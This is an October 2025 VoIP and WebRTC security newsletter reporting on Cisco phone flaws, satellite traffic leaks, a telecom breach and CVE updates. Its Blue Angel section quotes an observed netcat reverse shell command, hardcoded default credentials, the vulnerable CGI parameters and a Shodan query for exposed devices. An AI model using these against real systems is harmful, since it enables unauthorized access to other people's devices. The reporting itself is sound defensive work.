Welcome to the October 2025 edition of RTCSec Newsletter. This month brings us deep discussions on RTP security, critical vulnerabilities in widely deployed VoIP phones, massive satellite communication leaks, and a telecom infrastructure breach that went undetected for nine months.
In this edition, we cover:
- Our news: 2026 penetration testing bookings, OpenSIPIt meeting on RTP Bleed and Inject, and our VoIP eavesdropping defense guide
- Cisco VoIP phone vulnerabilities: Balazs Bucsay’s detailed presentation on critical flaws including unauthenticated remote packet capture
- Satellite link vulnerabilities: Research exposing massive unencrypted traffic from T-Mobile, AT&T, US military, and more
- Ribbon Communications breach: Nine-month nation-state intrusion into a major telecom infrastructure provider
- Blue Angel Software Suite: Active exploitation of hardcoded credentials and command injection affecting VoIP/SIP appliances
- WebRTC and Matrix RTC: Privacy leaks research on cross-browser IP metadata exposure, plus Matrix security and encryption architecture improvements
- Kamailio bogus CVEs: Why those configuration file vulnerabilities are nonsense
- Security updates round-up: Cisco, FreePBX, Ubiquiti, Issabel, and data breach reports
The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.
What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.
You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:
- Forward it to those who may find this newsletter particularly fruitful.
- Let us know if there are any RTC security news items we should cover.
To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.
Our news
Planning security testing for 2026?
We’re taking bookings for VoIP and WebRTC penetration testing in 2026. Our calendar for Q1 and Q2 is filling up fast.
If you need security testing for your SIP infrastructure, WebRTC applications, or RTC environments, get in touch soon to secure your spot. We specialize in finding the vulnerabilities that generic security assessments miss - the ones specific to real-time communications that we write about in this newsletter every month.
Whether you’re running Asterisk, FreeSWITCH, Kamailio, a WebRTC platform, or a proprietary VoIP system, we’ve tested it (or something very similar). We know where to look.
OpenSIPIt live meeting about RTP attacks: Bleed and Inject
The OpenSIPIt team from Sippy Labs invited us to discuss RTP Bleed and RTP Inject, two persistent vulnerabilities affecting Real-time Transport Protocol implementations. We walked through the ClueCon presentation on these attacks (watch that here) before diving into mitigation strategies.
Maksym Sobolyev presented his approach to mitigating RTP Bleed using the SSRC Attribute from RFC 5576 (Source-Specific Media Attributes in the Session Description Protocol). The proposal adds the SSRC (Synchronization Source) media attribute to SDP to verify whether incoming RTP streams have a known SSRC. Razvan and I noted potential issues with this solution.
We also discussed a heuristic for detecting RTP attacks and blocking potential attackers. Nikolay Shakin presented a method particularly suitable for rtpengine (due to its kernel module), where a ratio of “good packets” (to open ports) to “bad packets” (to closed/honey ports) is calculated.
Overall it was a valuable discussion for anyone implementing or developing media servers for RTP.
Watch the live meeting on YouTube.
VoIP eavesdropping: Defense tactics and threat analysis
We published a guide on our blog by Akash Gupta on defending against VoIP eavesdropping attacks. The article covers three attack categories:
- Packet sniffing: Attackers use tools like Wireshark to capture unencrypted VoIP traffic and reassemble packets into audible conversations
- MITM attacks: BGP hijacking to manipulate routing tables, or compromising routers to redirect traffic through attacker-controlled systems
- RTP Bleed: An RTP vulnerability affecting media servers that allows eavesdropping on active calls
Defense measures include encrypting signaling with TLS and media streams with SRTP, using MFA for admin access, regular patching, quarterly penetration tests of SIP infrastructure, properly configured Session Border Controllers that validate SIP messages, dedicated VLANs for VoIP traffic, anomaly detection for suspicious SIP patterns, and VPNs for remote workers.
What’s happening?
Kamailio 5.5 vulnerabilities in config handler
Four CVEs were issued for Kamailio’s configuration parser: CVE-2025-12204, CVE-2025-12205, CVE-2025-12206, and CVE-2025-12207. The vulnerabilities are said to affect Kamailio 5.5, which is severely outdated (released back in 2021 when the latest version on the 5.x branch is v5.7.7).
Here’s the problem: these “vulnerabilities” require loading malicious configuration files into Kamailio. If you’re loading malicious configuration files into your SIP server, you’ve already lost. The advisories aren’t even fully public - the configuration files to reproduce these issues are behind a login form that requires a Chinese phone number.
These advisories seem both bogus and irrelevant. Kamailio isn’t the only project hit by this nonsense. dnsmasq and other projects were targeted with similar questionable CVEs. The CVE issuer VulDb is not doing a great job at vetting this information.
List of all known Kamailio vulnerabilities
On the Kamailio mailing list, James Morisson asked if there is a list of all known Kamailio vulnerabilities, especially for version 5.3 or higher. Core developer Henning Westerholt responded with a link to the CVE website and wrote:
We recommend always updating production environments to the latest released versions of the current maintained stable branches, e.g. right now 5.8.x and 6.0.x without too much delay.
The conversation continued about backporting and how it’s not a long term feasible strategy for Kamailio due to breaking changes.
Worth noting: Kamailio frequently gets code changes that improve its security. These updates don’t get much attention from a vulnerability standpoint, but some of them likely fix exploitable vulnerabilities.
Is your phone spying on you? An in-depth analysis of vulnerabilities in Cisco VoIP phones - Balazs Bucsay
Balazs Bucsay of Mantra Information Security presented at BSides Dublin about serious vulnerabilities in Cisco VoIP phones deployed in thousands of organizations. The YouTube video of his talk is now available, and it doesn’t disappoint!
We previously covered these vulnerabilities when Cisco first issued their advisory in May 2024. Now with Bucsay’s detailed presentation, we get the full story behind these critical flaws.
The most critical vulnerability discovered is an unauthenticated remote packet capture capability. Attackers can remotely and without authentication use built-in API endpoints to start, stop, and download network traffic captures (tcpdump) from the phone. This allows for the interception of not only VoIP conversations but also all data from computers connected to the network through the phone.
Other significant findings include an unauthenticated Denial of Service (DoS) vulnerability that can trap the device in a reboot loop, and a buffer overflow that enables traffic interception via a malicious proxy. These vulnerabilities were found in stock firmware for devices similar to models observed being used in high-security locations like the White House.
Cisco has issued patches, but without an automated update mechanism, many devices likely remain vulnerable. Bucsay notes these discoveries are just the “tip of the iceberg” and uses the research to explore the messy, non-linear reality of security research. His talk raises hard questions about how such fundamental flaws persisted for years in a market-leading product. The state of device security is worrying.
In case you were wondering how this was reported in the Cisco advisory:
CVE-2024-20357 - Cisco IP Phone Unauthorized Access Vulnerability: This flaw allows an unauthenticated, remote attacker to send a crafted XML request to initiate phone calls or play sounds on an affected device.
CVE-2024-20376 - Cisco IP Phone Denial of Service (DoS) Vulnerability: An unauthenticated, remote attacker can send a crafted request to the web interface, causing the device to reload. This is also referred to as a .BSS Buffer Overflow.
CVE-2024-20378 - Cisco IP Phone Information Disclosure Vulnerability: A lack of authentication for certain endpoints allows an unauthenticated, remote attacker to retrieve sensitive information, capture user credentials, and record network traffic, including VoIP calls.
This research came from a collaboration between Balazs Bucsay (Mantra Information Security) and Liviu Rombaut and Peter Lemmens (Davinsi Labs). Excellent work.
Satellite link vulnerabilities: massive unencrypted traffic exposure
Researchers from UC San Diego and University of Maryland published “Don’t Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites”, showing how GEO satellites leak sensitive data due to lack of network-level encryption. The paper won a Distinguished Paper Award at ACM CCS 2025.
As various people, including Kevin Karhan, have pointed out, this is not exactly new. In fact, we had presentations about this at cyber-security conferences before it was called cyber-security 😉. That doesn’t make it less important to publish this since one could easily assume that this is a thing of the past.
I’ll quote Vinoth Deivasigamani here so that the audience of this newsletter understands why this caught our eye:
This is insane! A few researchers from UCSD and UMCP scanned a bunch of satellite links, found much of the traffic is not encrypted, and went on to decode them. It’s amazing what came out.
- T-Mobile backhaul: Users’ SMS, voice call contents and internet traffic content in plain text.
- AT&T Mexico cellular backhaul: Raw user internet traffic
- TelMex VOIP on satellite backhaul: Plaintext voice calls
- U.S. military: SIP traffic exposing ship names
- Mexico government and military: Unencrypted intra-government traffic
- Walmart Mexico: Unencrypted corporate emails, plaintext credentials to inventory management systems, inventory records transferred and updated using FTP
While it is important to work on futuristic threats such as Quantum cryptanalysis, backdoors in standardized cryptographic protocols, etc. - the unfortunate reality is that the vast majority of real-world attacks happen because basic protection is not enabled. Let’s not take our eyes off the basics.
Great work, Wenyi Zhang, Annie Dai, Keegan Ryan, Dave Levin, Nadia Heninger and Aaron Schulman!
Ribbon Communications nation-state breach
Hot off the press:
Ribbon Communications, a Texas-based telecom infrastructure provider, disclosed a nation-state breach that went undetected for almost nine months. The company discovered unauthorized access to its IT network in early September 2025, but evidence shows the threat actor may have gained initial access as early as December 2024.
The attackers accessed four customer files stored on two laptops outside Ribbon’s main network. Three smaller customers were notified, though Ribbon hasn’t named them or identified their sectors. The company says there’s no evidence the attackers accessed material information or infiltrated customer systems directly.
This matters because Ribbon provides telecommunications infrastructure to major carriers (Verizon, AT&T, BT, Deutsche Telekom, Comcast, CenturyLink) and the US Department of Defense. The company also serves financial institutions including Bank of America, JPMorgan Chase, and Wells Fargo. We often see Ribbon SBCs in our work.
Ribbon disclosed the breach in its SEC 10-Q filing on October 23, 2025. The company worked with federal law enforcement and third-party cybersecurity experts to investigate and believes the threat actor has been removed from its network.
No attribution was provided, but security analysts noted similarities to the Salt Typhoon campaign, the China-linked espionage group that compromised multiple US telecom providers including AT&T, Verizon, and Lumen.
Further coverage:
- BleepingComputer: Major telecom services provider Ribbon breached by state hackers
- Hackread: Year-Long Nation-State Hack Hits US Telecom Ribbon Communications
- The Register: Major telecom supplier compromised by nation-state crew
Blue Angel Software Suite: Active exploitation of hardcoded credentials and command injection
Two vulnerabilities in the Blue Angel Software Suite are being actively exploited in the wild. The first is a hardcoded credentials vulnerability (CVE-2025-34034, CVSS 9.3) that provides administrative access using default/backdoor accounts (Exploit-DB’s PoC includes blueangel:blueangel, guest:guest and other hardcoded credentials). The second is a command injection flaw (CVE-2025-34033) in the /cgi-bin/webctrl.cgi endpoint that allows authenticated attackers to execute arbitrary commands as root through the ping functionality.
Note: recent attacks seen in the wild use a POST to action=pingconfig_update with the ipaddress parameter (SANS honeypots), while NVD references ping_addr in a GET to pingtest_update - both are command-injection variants of the same underlying bug.
Public exploit code has been available since 2019 (Exploit-DB EDB-46792). SANS honeypots detected active exploitation starting October 21, 2025, with attackers using netcat reverse shells (nc 87.120.191.94 31331 -e/bin/sh) injected into the ipaddress parameter. Shadowserver’s dashboard shows ongoing scanning and exploitation activity.
What’s being exploited:
The Blue Angel Software Suite from 5V Technologies (Taiwan) is an embedded software stack OEM-bundled into VoIP/SIP appliances, broadband CPE, and white-label network devices. The vulnerability chain works like this: attackers use hardcoded credentials to authenticate, then exploit insufficient input validation in the ping command to inject shell commands.
Affected device types:
- VoIP/SIP appliances (SIP gateways, VoIP PBX systems, session border controllers with web management interfaces)
- Broadband CPE and router-class appliances using Blue Angel for management utilities
- White-label embedded devices from multiple manufacturers
The Shodan query http.html:"/cgi-bin/webctrl.cgi" returns numerous potentially vulnerable devices.
Matrix Real-Time Communication (RTC) technology update
Timo Kandra, VoIP engineer at Element, gave an excellent talk on MatrixRTC updates covering security and encryption architecture improvements for Matrix’s real-time communications.
Key topics covered:
- Security and encryption architecture evolution in MatrixRTC
- How key distribution works for real-time Matrix sessions
- Integrating Element Call into clients using the Rust or JS-SDK
- Practical implementation details for bringing encrypted calling to Matrix users
If you’re building Matrix clients or interested in how Matrix handles secure real-time communications, this talk provides technical details on the current state of MatrixRTC.
WebRTC privacy leaks: Cross-browser IP metadata exposure study
A new paper from Istanbul Aydin University examines how WebRTC continues to leak metadata and IP addresses through the Interactive Connectivity Establishment (ICE) process, even in 2025.
Key takeaways:
Persistent leakage: All tested browsers except Tor expose some form of identifying metadata. This occurs silently, without user consent, and can be exploited for tracking, fingerprinting, and network reconnaissance.
Desktop vs. mobile divergence: A significant privacy disparity exists between desktop and mobile platforms. Modern desktop browsers have largely mitigated direct Local Area Network (LAN) IP leakage, but mobile versions of Chrome and Firefox continue to expose these addresses by default.
mDNS as a new fingerprinting vector: To replace direct LAN IPs, Chromium-based browsers (Chrome, Brave) now expose Multicast DNS (mDNS)
.localhostnames. While this obfuscates the internal IP, these identifiers are often stable within a browsing session, creating a new vector for short-term user fingerprinting.Novel CGNAT leakage threat: The study identifies a previously underexamined threat on mobile 4G networks. Android versions of Chrome and Firefox leak Carrier-Grade NAT (CGNAT) internal IP addresses (
10.x.x.x), which can serve as a stable, subscriber-level identifier for tracking users at the Internet Service Provider (ISP) level.Browser protection hierarchy: The research establishes a clear hierarchy of privacy protection among major browsers:
Tor Browser: Consistently prevents all forms of IP and metadata leakage across all platforms.
Firefox (Desktop): Offers the strongest protection outside of Tor, emitting pseudo-candidates that conceal both LAN and mDNS identifiers.
Brave: Hides internal LAN/CGNAT IPs but still leaks session-stable mDNS identifiers.
Chrome & Firefox (Mobile): Exhibit the weakest privacy posture, leaking direct LAN IPs on Wi-Fi and CGNAT IPs on mobile networks.
The findings demonstrate that WebRTC privacy risks have evolved rather than been resolved. The threat has shifted from overt LAN IP exposure on desktops to more subtle vectors like mDNS and CGNAT leakage, with mobile platforms lagging dangerously behind in protection.
My opinion:
The nature of WebRTC, or any protocol that needs to support peer-to-peer real-time communications, conflicts with certain privacy requirements. This involves an important tradeoff.
How does Tor Browser solve this? Well, Tor Browser is built without WebRTC and also ships with preferences that keep it off at build time.
Security updates and vulnerability news round-up
Cisco BroadWorks CommPilot XSS vulnerability (CVE-2025-20307)
Cisco BroadWorks CommPilot Application Software has a Cross-Site Scripting vulnerability tracked as CVE-2025-20307. Exploitation requires administrator authentication, making this medium severity. Thanks to Miguel Guerrero and Pablo Sanchez from CovertSwarm Limited for reporting this issue.
Cisco IP Phone DoS and XSS vulnerabilities (CVE-2025-20350, CVE-2025-20351)
Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone 8875 are affected by two vulnerabilities: CVE-2025-20350 (DoS) and CVE-2025-20351 (XSS). The DoS is caused by a buffer overflow in the web interface that forces affected phones to reload. Web Access must be enabled for exploitation, which is disabled by default. Kent Yoder of Cisco’s Advanced Security Initiatives Group (ASIG) discovered these during internal security testing.
Ubiquiti UniFi Talk debugging vulnerability (CVE-2025-52663)
UniFi Talk Touch, Talk Touch Max, and Talk G3 series devices have debugging functions left active, tracked as CVE-2025-52663. The vulnerability allows remote exploitation via management network access through exposed debug APIs. Discovered by security researchers Bongeun Koo (@kiddo_pwn, STEALIEN) and Junhyung Cho (@da2rim). Koo is a regular Pwn2Own competitor who recently exploited a Ubiquiti EV charger at Pwn2Own Automotive 2025.
Cisco RoomOS information disclosure vulnerability (CVE-2025-20329)
Cisco TelePresence CE and RoomOS have an information disclosure vulnerability (CVE-2025-20329, CVSS 4.9) where sensitive information leaks in logs. The vulnerability requires valid administrative credentials for exploitation. When SIP media logging is enabled, credentials are stored unencrypted and can be disclosed through this vulnerability.
FreePBX Endpoint Manager arbitrary file upload vulnerability (CVE-2025-61678)
FreePBX Endpoint Management module has an arbitrary file upload vulnerability (CVE-2025-61678, CVSS 8.6) via the fwbrand parameter. Affects FreePBX 16 before 16.0.92 and FreePBX 17 before 17.0.6. Requires authenticated access with high-level privileges and can deploy webshells on the system—the type of vulnerability typically chained for full exploitation. Update to 16.0.92 or 17.0.6.
FreePBX XSS vulnerability enables admin session hijacking (CVE-2025-59429)
A reflected XSS vulnerability (CVE-2025-59429) exists on the Asterisk HTTP Status page (port 8089) that enables admin session hijacking. Affects FreePBX versions before 16.0.68.39 and 17.0.18.38. Update to patched versions.
Cisco Unified Communications Manager stored XSS vulnerability (CVE-2025-20361)
Cisco Unified CM and CM SME web management interface has a stored XSS vulnerability (CVE-2025-20361, CVSS 4.8). Exploitation requires valid administrative credentials, resulting in the medium severity rating.
Issabel PBX multiple XSS vulnerabilities (CVE-2025-40647, CVE-2025-40648)
Issabel PBX v5.0.0 has two stored XSS vulnerabilities discovered by Oriol Vilella Jam. CVE-2025-40647 (CVSS 5.1) affects the issabel-pbx module via the email parameter in the address book. CVE-2025-40648 (CVSS 4.8) affects the issabel-agenda module via the numero_conferencia parameter in conference settings. Patched in issabel-pbx v5.0.0-2 and issabel-agenda v5.0.0-4.
Hello Gym data breach: 1.6M audio files expose member PII
Hello Gym exposed 1.6 million audio files containing internal calls and member personal information. The call recordings included sensitive member data, likely from a storage repository for VoIP audio files intended for internal use.
Where you store your VoIP data matters.
Huddle01 data leak: Kafka broker exposes 600K+ user records
Huddle01’s WebRTC video calling platform exposed 621,000+ log entries through an unprotected Kafka broker. The leaked data includes usernames, emails, crypto wallet details, IP addresses, and meeting metadata.
WebRTC’s security features don’t help if you’re logging everything to an unprotected database.
Nuclei adds detection for Mitel MiCollab SQLi vulnerability (CVE-2024-35286)
ProjectDiscovery added a Nuclei template for detecting CVE-2024-35286, a critical SQL injection in Mitel MiCollab NuPoint Messenger that was exploited in the wild. The template enables security teams to scan for this severe vulnerability using the Nuclei scanner.
Sidecar: Privacy-preserving call metadata transmission protocol
Researchers published a paper addressing STIR/SHAKEN security limitations when calls hit legacy SS7/TDM or SIP hops that strip headers and break attestation. The current “out-of-band” industry fix (OOB S/S) pushes PASSporTs and call metadata into third-party databases in the clear, allowing any participating intermediary to see who’s calling whom and when—a privacy and trade-secret nightmare.
Sidecar proposes a privacy-preserving, out-of-band channel that accompanies each call to solve this problem.
Thanks to Vulners and other third parties for providing vulnerability source material.
This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share.
To subscribe: here